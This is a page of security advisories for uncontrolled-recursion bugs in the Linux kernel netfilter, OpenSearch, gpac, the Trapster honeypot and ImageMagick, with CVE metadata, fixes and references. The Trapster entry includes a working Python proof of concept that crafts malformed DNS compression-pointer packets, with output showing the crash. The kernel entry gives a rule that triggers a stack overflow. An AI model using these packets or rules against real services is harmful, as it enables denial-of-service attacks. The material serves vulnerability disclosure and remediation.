Common Weakness Enumeration

CWE-674

Allowed-with-Review

Uncontrolled Recursion

Abstraction: Class · Status: Draft

The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack.

616 vulnerabilities reference this CWE, most recent first.

GHSA-MRF2-HC9C-229V

Vulnerability from github – Published: 2026-06-25 09:31 – Updated: 2026-06-28 09:31
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

netfilter: nft_ct: bail out on template ct in get eval

I noticed this issue while looking at a historic syzbot report 1.

A rule like the one below is enough to trigger the bug:

table ip t {
    chain pre {
        type filter hook prerouting priority raw;
        ct zone set 1
        ct original saddr 1.2.3.4 accept
    }
}

The first expression attaches a per-cpu template ct via nft_ct_set_zone_eval() (nf_ct_tmpl_alloc -> kzalloc, tuple is all zero, nf_ct_l3num(ct) == 0). The next expression then calls nft_ct_get_eval() on the same skb, treats the template as a real ct and hits the 16-byte memcpy path. With dreg at NFT_REG32_15 this overflows past struct nft_regs on the kernel stack; with smaller dreg values it silently clobbers adjacent registers.

Reject template ct at the eval entry and in nft_ct_get_fast_eval(), mirroring the check nft_ct_set_eval() already has. Additionally, bound the address copy in NFT_CT_SRC / NFT_CT_DST by priv->len instead of by nf_ct_l3num(ct): nf_ct_get_tuple() zeroes the tuple before pkt_to_tuple() fills in only the protocol-relevant leading bytes, so the trailing bytes of tuple->{src,dst}.u3.all are well-defined zero. priv->len is validated at rule load, so the copy size is now bounded by the destination register rather than by an untrusted field on the conntrack.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-53267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-25T09:16:44Z",
    "severity": "HIGH"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_ct: bail out on template ct in get eval\n\nI noticed this issue while looking at a historic syzbot report [1].\n\nA rule like the one below is enough to trigger the bug:\n\n    table ip t {\n        chain pre {\n            type filter hook prerouting priority raw;\n            ct zone set 1\n            ct original saddr 1.2.3.4 accept\n        }\n    }\n\nThe first expression attaches a per-cpu template ct via\nnft_ct_set_zone_eval() (nf_ct_tmpl_alloc -\u003e kzalloc, tuple is all\nzero, nf_ct_l3num(ct) == 0). The next expression then calls\nnft_ct_get_eval() on the same skb, treats the template as a real ct\nand hits the 16-byte memcpy path. With dreg at NFT_REG32_15 this\noverflows past struct nft_regs on the kernel stack; with smaller\ndreg values it silently clobbers adjacent registers.\n\nReject template ct at the eval entry and in nft_ct_get_fast_eval(),\nmirroring the check nft_ct_set_eval() already has. Additionally,\nbound the address copy in NFT_CT_SRC / NFT_CT_DST by priv-\u003elen\ninstead of by nf_ct_l3num(ct): nf_ct_get_tuple() zeroes the tuple\nbefore pkt_to_tuple() fills in only the protocol-relevant leading\nbytes, so the trailing bytes of tuple-\u003e{src,dst}.u3.all are\nwell-defined zero. priv-\u003elen is validated at rule load, so the\ncopy size is now bounded by the destination register rather than\nby an untrusted field on the conntrack.\n\n[1]: https://syzkaller.appspot.com/bug?id=389cf09cb72926114fce90dc85a2c3231dcb647c",
  "id": "GHSA-mrf2-hc9c-229v",
  "modified": "2026-06-28T09:31:47Z",
  "published": "2026-06-25T09:31:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53267"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/2e154b5f53f1b0b490c7b8b02499f90feb86b1d5"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/3027ecbdb5fdf9200251c21d4818e4c447ef78e1"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/8470f676eadeab99132708acb1a85915664d6115"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/af80f78ce984649e1698b841cd33f4fa505ad828"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/f071b0bf078146368d18e4eec386bf2ddc0ab7e0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MW3V-MMFW-3X2G

Vulnerability from github – Published: 2025-11-25 21:32 – Updated: 2026-01-22 13:50
VLAI
Summary
OpenSearch is vulnerable to DoS via complex query_string inputs
Details

A vulnerability in OpenSearch allows attackers to cause Denial of Service (DoS) by submitting complex query_string inputs.

This issue affects all OpenSearch versions below 2.19.4 and versions 3.0.0 through 3.2.0.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.opensearch:opensearch-common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.opensearch:opensearch-common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.19.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-9624"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-26T22:10:36Z",
    "nvd_published_at": "2025-11-25T20:16:01Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in OpenSearch allows attackers to cause Denial of Service (DoS) by submitting complex query_string inputs.\n\nThis issue affects all OpenSearch versions below 2.19.4 and versions 3.0.0 through 3.2.0.",
  "id": "GHSA-mw3v-mmfw-3x2g",
  "modified": "2026-01-22T13:50:34Z",
  "published": "2025-11-25T21:32:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9624"
    },
    {
      "type": "WEB",
      "url": "https://github.com/opensearch-project/OpenSearch/pull/19491"
    },
    {
      "type": "WEB",
      "url": "https://caverav.cl/posts/opensearch-dos/opensearch-dos"
    },
    {
      "type": "WEB",
      "url": "https://fluidattacks.com/advisories/chick"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/opensearch-project/OpenSearch"
    },
    {
      "type": "WEB",
      "url": "https://github.com/opensearch-project/OpenSearch/releases/tag/2.19.4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/opensearch-project/OpenSearch/releases/tag/3.3.0"
    },
    {
      "type": "WEB",
      "url": "https://opensearch.org/blog/explore-opensearch-3-3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenSearch is vulnerable to DoS via complex query_string inputs"
}

GHSA-MXRW-65PF-J4FF

Vulnerability from github – Published: 2022-09-16 00:00 – Updated: 2022-09-20 00:00
VLAI
Details

Uncontrolled Recursion in GitHub repository gpac/gpac prior to 2.1.0-DEV.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-3222"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-15T09:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Uncontrolled Recursion in GitHub repository gpac/gpac prior to 2.1.0-DEV.",
  "id": "GHSA-mxrw-65pf-j4ff",
  "modified": "2022-09-20T00:00:29Z",
  "published": "2022-09-16T00:00:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3222"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gpac/gpac/commit/4e7736d7ec7bf64026daa611da951993bb42fdaf"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/b29c69fa-3eac-41e4-9d4f-d861aba18235"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2023/dsa-5411"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MXWC-WH95-PW4G

Vulnerability from github – Published: 2026-07-08 20:24 – Updated: 2026-07-08 20:24
VLAI
Summary
Trapster Community: Unauthenticated malformed DNS compression pointers crash per-packet honeypot handler
Details

Summary

trapster.libs.dns.decode_labels() decodes DNS names from attacker-supplied UDP packets and recurses once per RFC 1035 compression pointer with no cycle detection and no depth bound. A single unauthenticated UDP datagram sent to the DNS honeypot drives the function past CPython's recursion limit, raising RecursionError. That exception is not handled anywhere on the datagram_received path, so it escapes into the asyncio event loop's default exception handler, the per-packet proxy task is never created, and a low-rate flood produces sustained CPU burn and log flooding (denial of service of the DNS honeypot module).

Severity

Medium (CVSS:3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). Network-reachable, unauthenticated, single-packet, availability-only against the DNS honeypot listener.

Affected component

  • File: trapster/libs/dns.py, function decode_labels() (called by decode_question_sectiondecode_dns_message).
  • Reached from: trapster/modules/dns.py, DnsUdpProtocol.datagram_received()dns.decode_dns_message(data), where data is the raw attacker UDP payload received by DnsHoneypot on its configured bind address/port.
  • Version tested: latest main at commit 23156739de23816657cbc4582ad32094ed1cab43.

Details

decode_labels implements RFC 1035 §4.1.4 name compression:

def decode_labels(message, offset):
    labels = []
    while True:
        length, = struct.unpack_from("!B", message, offset)
        if (length & 0xC0) == 0xC0:
            pointer, = struct.unpack_from("!H", message, offset)
            offset += 2
            return labels + decode_labels(message, pointer & 0x3FFF), offset   # <-- recurses per pointer
        ...

Each compression pointer triggers a fresh recursive call to decode_labels. There is:

  • No cycle detection — a pointer that targets its own offset recurses forever.
  • No depth bound — a chain of distinct forward pointers recurses once per pointer.

Either shape exhausts the Python stack and raises RecursionError. decode_dns_message does not catch it, and in DnsUdpProtocol.datagram_received the call dns.decode_dns_message(data) is unguarded, so the exception propagates out of datagram_received into the event loop. Each hostile packet therefore aborts its own packet-handling/proxy task, and the loop's default exception handler logs a full traceback for every packet.

This is the same class of bug fixed upstream in python-zeroconf (compression-pointer recursion), except this implementation additionally lacks the loop/cycle guard that zeroconf already had.

Proof of Concept

Real-deploy E2E. The actual trapster.modules.dns.DnsHoneypot server is started on a real UDP socket; hostile packets are sent from a separate real client socket over loopback. The event-loop exception handler records what escapes datagram_received.

e2e_poc.py:

import asyncio, struct, socket, sys
from trapster.modules.dns import DnsHoneypot
from trapster.logger.base import BaseLogger

HOST, PORT = "127.0.0.1", 15353
captured_loop_exceptions = []

def build_benign_query(qname=b"example.com"):
    header = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)
    labels = b"".join(struct.pack("!B", len(p)) + p for p in qname.split(b".")) + b"\x00"
    return header + labels + struct.pack("!2H", 1, 1)

def build_self_pointer():
    header = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)
    name = struct.pack("!H", 0xC000 | 12)   # pointer to offset 12 == this name
    return header + name + struct.pack("!2H", 1, 1)

def build_pointer_chain(depth=2000):
    header = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)
    name = struct.pack("!H", 0xC000 | 18)
    qtail = struct.pack("!2H", 1, 1)
    chain = bytearray()
    for i in range(depth):
        chain += struct.pack("!H", 0xC000 | (18 + 2 * (i + 1)))
    chain += b"\x00"
    return header + name + qtail + bytes(chain)

def send_udp(payload, timeout=1.0):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.settimeout(timeout)
    s.sendto(payload, (HOST, PORT))
    try: return s.recvfrom(4096)[0]
    except socket.timeout: return None
    finally: s.close()

async def main():
    loop = asyncio.get_running_loop()
    def handler(loopobj, context):
        exc = context.get("exception")
        captured_loop_exceptions.append((repr(exc), context.get("message")))
        print(f"[loop-exception-handler] {type(exc).__name__ if exc else None}: {context.get('message')}")
    loop.set_exception_handler(handler)

    hp = DnsHoneypot(config={"port": PORT, "target_dns": "127.0.0.1"},
                     logger=BaseLogger(node_id="e2e"), bindaddr=HOST)
    await hp.start(); await asyncio.sleep(0.4)
    print(f"[deploy] DnsHoneypot listening on udp://{HOST}:{PORT}\n")

    print("=== NEGATIVE CONTROL: benign query example.com A ===")
    captured_loop_exceptions.clear(); send_udp(build_benign_query()); await asyncio.sleep(0.3)
    print(f"  loop exceptions after benign packet: {len(captured_loop_exceptions)}")
    assert len(captured_loop_exceptions) == 0
    print("  -> benign packet parsed cleanly, no exception\n")

    print("=== VECTOR A: single self-referential compression pointer (cycle) ===")
    captured_loop_exceptions.clear(); pkt = build_self_pointer()
    print(f"  packet ({len(pkt)} bytes) name field = pointer 0xC00C -> offset 12 (itself)")
    send_udp(pkt); await asyncio.sleep(0.5)
    print(f"  loop exceptions captured: {len(captured_loop_exceptions)}")
    for e in captured_loop_exceptions: print(f"    {e}")
    assert any("RecursionError" in e[0] for e in captured_loop_exceptions)
    print("  -> RecursionError escaped datagram_received (DoS, no cycle guard)\n")

    print("=== VECTOR B: 2000 chained forward compression pointers (zeroconf shape) ===")
    captured_loop_exceptions.clear(); pkt = build_pointer_chain(2000)
    print(f"  packet ({len(pkt)} bytes) = 2000-deep forward pointer chain")
    send_udp(pkt); await asyncio.sleep(0.5)
    print(f"  loop exceptions captured: {len(captured_loop_exceptions)}")
    for e in captured_loop_exceptions: print(f"    {e}")
    assert any("RecursionError" in e[0] for e in captured_loop_exceptions)
    print("  -> RecursionError escaped datagram_received (DoS, no depth bound)\n")

    await hp.stop(); print("ALL ASSERTIONS PASSED")

if __name__ == "__main__":
    sys.setrecursionlimit(1000)
    asyncio.run(main())

Verbatim run against the deployed honeypot at commit 23156739de23816657cbc4582ad32094ed1cab43:

[deploy] DnsHoneypot listening on udp://127.0.0.1:15353

=== NEGATIVE CONTROL: benign query example.com A ===
  loop exceptions after benign packet: 0
  -> benign packet parsed cleanly, no exception

=== VECTOR A: single self-referential compression pointer (cycle) ===
  packet (18 bytes) name field = pointer 0xC00C -> offset 12 (itself)
[loop-exception-handler] RecursionError: Exception in callback _SelectorDatagramTransport._read_ready()
  loop exceptions captured: 1
    ("RecursionError('maximum recursion depth exceeded in comparison')", 'Exception in callback _SelectorDatagramTransport._read_ready()')
  -> RecursionError escaped datagram_received (DoS, no cycle guard)

=== VECTOR B: 2000 chained forward compression pointers (zeroconf shape) ===
  packet (4019 bytes) = 2000-deep forward pointer chain
[loop-exception-handler] RecursionError: Exception in callback _SelectorDatagramTransport._read_ready()
  loop exceptions captured: 1
    ("RecursionError('maximum recursion depth exceeded in comparison')", 'Exception in callback _SelectorDatagramTransport._read_ready()')
  -> RecursionError escaped datagram_received (DoS, no depth bound)

ALL ASSERTIONS PASSED

The negative control (a well-formed example.com A query) parses with zero exceptions, confirming the crash is specific to the malformed compression input.

Impact

Any host able to send UDP to the DNS honeypot's bind address/port (unauthenticated, no UI) can crash the per-packet handler with a single ~18-byte datagram. A low-rate flood (a few packets per second) keeps the event loop logging full tracebacks and burning CPU, degrading the DNS honeypot and its logging pipeline. Availability impact only; no memory disclosure or code execution.

Suggested fix

Make decode_labels iterative-bounded: require every compression pointer to point strictly backward to a not-yet-visited offset, which bounds both cycles and long forward chains in O(message length) with no recursion. (This mirrors dnspython's biggest_pointer design and the zeroconf depth-bound fix.) Replace the bare raise "unknown label encoding" with a real exception, and consider wrapping dns.decode_dns_message(data) in DnsUdpProtocol.datagram_received in a try/except so a malformed packet is logged once rather than escaping to the loop handler.

Verified fix (benign + legitimate backward-compression names still decode; both hostile vectors are bounded to ValueError with no recursion):

def decode_labels(message, offset):
    labels = []
    return_offset = None
    max_allowed_pointer = len(message)
    while True:
        length, = struct.unpack_from("!B", message, offset)
        if (length & 0xC0) == 0xC0:
            pointer, = struct.unpack_from("!H", message, offset)
            if return_offset is None:
                return_offset = offset + 2
            target = pointer & 0x3FFF
            if target >= max_allowed_pointer:
                raise ValueError("invalid DNS compression pointer")
            max_allowed_pointer = target
            offset = target
            continue
        if (length & 0xC0) != 0x00:
            raise ValueError("unknown label encoding")
        offset += 1
        if length == 0:
            return labels, return_offset if return_offset is not None else offset
        labels.append(*struct.unpack_from("!%ds" % length, message, offset))
        try:
            labels[-1] = labels[-1].decode()
        except UnicodeDecodeError:
            labels[-1] = str(labels[-1])
        offset += length

A fix PR will be supplied from a temporary private fork during the embargo.

Credit

Discovered and reported by tonghuaroot.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "trapster"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-08T20:24:46Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\n`trapster.libs.dns.decode_labels()` decodes DNS names from attacker-supplied UDP packets and recurses **once per RFC 1035 compression pointer** with **no cycle detection and no depth bound**. A single unauthenticated UDP datagram sent to the DNS honeypot drives the function past CPython\u0027s recursion limit, raising `RecursionError`. That exception is not handled anywhere on the `datagram_received` path, so it escapes into the asyncio event loop\u0027s default exception handler, the per-packet proxy task is never created, and a low-rate flood produces sustained CPU burn and log flooding (denial of service of the DNS honeypot module).\n\n## Severity\n\nMedium (CVSS:3.1 `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`). Network-reachable, unauthenticated, single-packet, availability-only against the DNS honeypot listener.\n\n## Affected component\n\n- File: `trapster/libs/dns.py`, function `decode_labels()` (called by `decode_question_section` \u2192 `decode_dns_message`).\n- Reached from: `trapster/modules/dns.py`, `DnsUdpProtocol.datagram_received()` \u2192 `dns.decode_dns_message(data)`, where `data` is the raw attacker UDP payload received by `DnsHoneypot` on its configured bind address/port.\n- Version tested: latest `main` at commit `23156739de23816657cbc4582ad32094ed1cab43`.\n\n## Details\n\n`decode_labels` implements RFC 1035 \u00a74.1.4 name compression:\n\n```python\ndef decode_labels(message, offset):\n    labels = []\n    while True:\n        length, = struct.unpack_from(\"!B\", message, offset)\n        if (length \u0026 0xC0) == 0xC0:\n            pointer, = struct.unpack_from(\"!H\", message, offset)\n            offset += 2\n            return labels + decode_labels(message, pointer \u0026 0x3FFF), offset   # \u003c-- recurses per pointer\n        ...\n```\n\nEach compression pointer triggers a fresh recursive call to `decode_labels`. There is:\n\n- **No cycle detection** \u2014 a pointer that targets its own offset recurses forever.\n- **No depth bound** \u2014 a chain of distinct forward pointers recurses once per pointer.\n\nEither shape exhausts the Python stack and raises `RecursionError`. `decode_dns_message` does not catch it, and in `DnsUdpProtocol.datagram_received` the call `dns.decode_dns_message(data)` is unguarded, so the exception propagates out of `datagram_received` into the event loop. Each hostile packet therefore aborts its own packet-handling/proxy task, and the loop\u0027s default exception handler logs a full traceback for every packet.\n\nThis is the same class of bug fixed upstream in `python-zeroconf` (compression-pointer recursion), except this implementation additionally lacks the loop/cycle guard that zeroconf already had.\n\n## Proof of Concept\n\nReal-deploy E2E. The actual `trapster.modules.dns.DnsHoneypot` server is started on a real UDP socket; hostile packets are sent from a separate real client socket over loopback. The event-loop exception handler records what escapes `datagram_received`.\n\n`e2e_poc.py`:\n\n```python\nimport asyncio, struct, socket, sys\nfrom trapster.modules.dns import DnsHoneypot\nfrom trapster.logger.base import BaseLogger\n\nHOST, PORT = \"127.0.0.1\", 15353\ncaptured_loop_exceptions = []\n\ndef build_benign_query(qname=b\"example.com\"):\n    header = struct.pack(\"!6H\", 0x1234, 0x0100, 1, 0, 0, 0)\n    labels = b\"\".join(struct.pack(\"!B\", len(p)) + p for p in qname.split(b\".\")) + b\"\\x00\"\n    return header + labels + struct.pack(\"!2H\", 1, 1)\n\ndef build_self_pointer():\n    header = struct.pack(\"!6H\", 0x1234, 0x0100, 1, 0, 0, 0)\n    name = struct.pack(\"!H\", 0xC000 | 12)   # pointer to offset 12 == this name\n    return header + name + struct.pack(\"!2H\", 1, 1)\n\ndef build_pointer_chain(depth=2000):\n    header = struct.pack(\"!6H\", 0x1234, 0x0100, 1, 0, 0, 0)\n    name = struct.pack(\"!H\", 0xC000 | 18)\n    qtail = struct.pack(\"!2H\", 1, 1)\n    chain = bytearray()\n    for i in range(depth):\n        chain += struct.pack(\"!H\", 0xC000 | (18 + 2 * (i + 1)))\n    chain += b\"\\x00\"\n    return header + name + qtail + bytes(chain)\n\ndef send_udp(payload, timeout=1.0):\n    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.settimeout(timeout)\n    s.sendto(payload, (HOST, PORT))\n    try: return s.recvfrom(4096)[0]\n    except socket.timeout: return None\n    finally: s.close()\n\nasync def main():\n    loop = asyncio.get_running_loop()\n    def handler(loopobj, context):\n        exc = context.get(\"exception\")\n        captured_loop_exceptions.append((repr(exc), context.get(\"message\")))\n        print(f\"[loop-exception-handler] {type(exc).__name__ if exc else None}: {context.get(\u0027message\u0027)}\")\n    loop.set_exception_handler(handler)\n\n    hp = DnsHoneypot(config={\"port\": PORT, \"target_dns\": \"127.0.0.1\"},\n                     logger=BaseLogger(node_id=\"e2e\"), bindaddr=HOST)\n    await hp.start(); await asyncio.sleep(0.4)\n    print(f\"[deploy] DnsHoneypot listening on udp://{HOST}:{PORT}\\n\")\n\n    print(\"=== NEGATIVE CONTROL: benign query example.com A ===\")\n    captured_loop_exceptions.clear(); send_udp(build_benign_query()); await asyncio.sleep(0.3)\n    print(f\"  loop exceptions after benign packet: {len(captured_loop_exceptions)}\")\n    assert len(captured_loop_exceptions) == 0\n    print(\"  -\u003e benign packet parsed cleanly, no exception\\n\")\n\n    print(\"=== VECTOR A: single self-referential compression pointer (cycle) ===\")\n    captured_loop_exceptions.clear(); pkt = build_self_pointer()\n    print(f\"  packet ({len(pkt)} bytes) name field = pointer 0xC00C -\u003e offset 12 (itself)\")\n    send_udp(pkt); await asyncio.sleep(0.5)\n    print(f\"  loop exceptions captured: {len(captured_loop_exceptions)}\")\n    for e in captured_loop_exceptions: print(f\"    {e}\")\n    assert any(\"RecursionError\" in e[0] for e in captured_loop_exceptions)\n    print(\"  -\u003e RecursionError escaped datagram_received (DoS, no cycle guard)\\n\")\n\n    print(\"=== VECTOR B: 2000 chained forward compression pointers (zeroconf shape) ===\")\n    captured_loop_exceptions.clear(); pkt = build_pointer_chain(2000)\n    print(f\"  packet ({len(pkt)} bytes) = 2000-deep forward pointer chain\")\n    send_udp(pkt); await asyncio.sleep(0.5)\n    print(f\"  loop exceptions captured: {len(captured_loop_exceptions)}\")\n    for e in captured_loop_exceptions: print(f\"    {e}\")\n    assert any(\"RecursionError\" in e[0] for e in captured_loop_exceptions)\n    print(\"  -\u003e RecursionError escaped datagram_received (DoS, no depth bound)\\n\")\n\n    await hp.stop(); print(\"ALL ASSERTIONS PASSED\")\n\nif __name__ == \"__main__\":\n    sys.setrecursionlimit(1000)\n    asyncio.run(main())\n```\n\nVerbatim run against the deployed honeypot at commit `23156739de23816657cbc4582ad32094ed1cab43`:\n\n```\n[deploy] DnsHoneypot listening on udp://127.0.0.1:15353\n\n=== NEGATIVE CONTROL: benign query example.com A ===\n  loop exceptions after benign packet: 0\n  -\u003e benign packet parsed cleanly, no exception\n\n=== VECTOR A: single self-referential compression pointer (cycle) ===\n  packet (18 bytes) name field = pointer 0xC00C -\u003e offset 12 (itself)\n[loop-exception-handler] RecursionError: Exception in callback _SelectorDatagramTransport._read_ready()\n  loop exceptions captured: 1\n    (\"RecursionError(\u0027maximum recursion depth exceeded in comparison\u0027)\", \u0027Exception in callback _SelectorDatagramTransport._read_ready()\u0027)\n  -\u003e RecursionError escaped datagram_received (DoS, no cycle guard)\n\n=== VECTOR B: 2000 chained forward compression pointers (zeroconf shape) ===\n  packet (4019 bytes) = 2000-deep forward pointer chain\n[loop-exception-handler] RecursionError: Exception in callback _SelectorDatagramTransport._read_ready()\n  loop exceptions captured: 1\n    (\"RecursionError(\u0027maximum recursion depth exceeded in comparison\u0027)\", \u0027Exception in callback _SelectorDatagramTransport._read_ready()\u0027)\n  -\u003e RecursionError escaped datagram_received (DoS, no depth bound)\n\nALL ASSERTIONS PASSED\n```\n\nThe negative control (a well-formed `example.com` A query) parses with zero exceptions, confirming the crash is specific to the malformed compression input.\n\n## Impact\n\nAny host able to send UDP to the DNS honeypot\u0027s bind address/port (unauthenticated, no UI) can crash the per-packet handler with a single ~18-byte datagram. A low-rate flood (a few packets per second) keeps the event loop logging full tracebacks and burning CPU, degrading the DNS honeypot and its logging pipeline. Availability impact only; no memory disclosure or code execution.\n\n## Suggested fix\n\nMake `decode_labels` iterative-bounded: require every compression pointer to point strictly backward to a not-yet-visited offset, which bounds both cycles and long forward chains in O(message length) with no recursion. (This mirrors `dnspython`\u0027s `biggest_pointer` design and the zeroconf depth-bound fix.) Replace the bare `raise \"unknown label encoding\"` with a real exception, and consider wrapping `dns.decode_dns_message(data)` in `DnsUdpProtocol.datagram_received` in a try/except so a malformed packet is logged once rather than escaping to the loop handler.\n\nVerified fix (benign + legitimate backward-compression names still decode; both hostile vectors are bounded to `ValueError` with no recursion):\n\n```python\ndef decode_labels(message, offset):\n    labels = []\n    return_offset = None\n    max_allowed_pointer = len(message)\n    while True:\n        length, = struct.unpack_from(\"!B\", message, offset)\n        if (length \u0026 0xC0) == 0xC0:\n            pointer, = struct.unpack_from(\"!H\", message, offset)\n            if return_offset is None:\n                return_offset = offset + 2\n            target = pointer \u0026 0x3FFF\n            if target \u003e= max_allowed_pointer:\n                raise ValueError(\"invalid DNS compression pointer\")\n            max_allowed_pointer = target\n            offset = target\n            continue\n        if (length \u0026 0xC0) != 0x00:\n            raise ValueError(\"unknown label encoding\")\n        offset += 1\n        if length == 0:\n            return labels, return_offset if return_offset is not None else offset\n        labels.append(*struct.unpack_from(\"!%ds\" % length, message, offset))\n        try:\n            labels[-1] = labels[-1].decode()\n        except UnicodeDecodeError:\n            labels[-1] = str(labels[-1])\n        offset += length\n```\n\nA fix PR will be supplied from a temporary private fork during the embargo.\n\n## Credit\n\nDiscovered and reported by tonghuaroot.",
  "id": "GHSA-mxwc-wh95-pw4g",
  "modified": "2026-07-08T20:24:46Z",
  "published": "2026-07-08T20:24:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/0xBallpoint/trapster-community/security/advisories/GHSA-mxwc-wh95-pw4g"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/0xBallpoint/trapster-community"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Trapster Community: Unauthenticated malformed DNS compression pointers crash per-packet honeypot handler"
}

GHSA-P27M-HP98-6637

Vulnerability from github – Published: 2025-12-30 22:54 – Updated: 2025-12-30 22:54
VLAI
Summary
ImageMagick's failure to limit the depth of SVG file reads caused a DoS attack
Details

Summary

Using Magick to read a malicious SVG file resulted in a DoS attack.

Details

bt obtained using gdb:

#4 0x0000555555794c9c in ResizeMagickMemory (memory=0x7fffee203800, size=391344) at MagickCore/memory.c:1443
#5 0x0000555555794e5a in ResizeQuantumMemory (memory=0x7fffee203800, count=48918, quantum=8) 
at MagickCore/memory.c:1508
#6 0x0000555555acc8ed in SVGStartElement (context=0x517000000080, name=0x5190000055e3 "g", attributes=0x0) 
at coders/svg.c:1254
#7 0x00007ffff6799b1c in xmlParseStartTag () at /lib/x86_64-linux-gnu/libxml2.so.2
#8 0x00007ffff68c7bb8 in () at /lib/x86_64-linux-gnu/libxml2.so.2
#9 0x00007ffff67a03f1 in xmlParseChunk () at /lib/x86_64-linux-gnu/libxml2.so.2

This is related to the SVGStartElement and ResizeQuantumMemory functions.

PoC

  1. Generate an SVG file

  2. Read this file using Magick:

./magick /data/ylwang/Tools/LargeScan/targets/ImageMagick/test++/1.svg null
  1. Causes a DoS Attack

My server has a large amount of memory, causing a stack overflow to take a long time. I'll use the Windows release version as an example:

PS C:\Program Files\ImageMagick-7.1.2-Q8> .\magick.exe -ping 1.svg null:
PS C:\Program Files\ImageMagick-7.1.2-Q8> echo $LASTEXITCODE
-1073741571

The error code -1073741571 indicates a crash due to a stack overflow.

Impact

This is a DoS vulnerability and all applications using Magick to parse SVG files are affected.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-AnyCPU"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-AnyCPU"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-AnyCPU"
      },
      "ranges": [
        {
          "events": [
            {
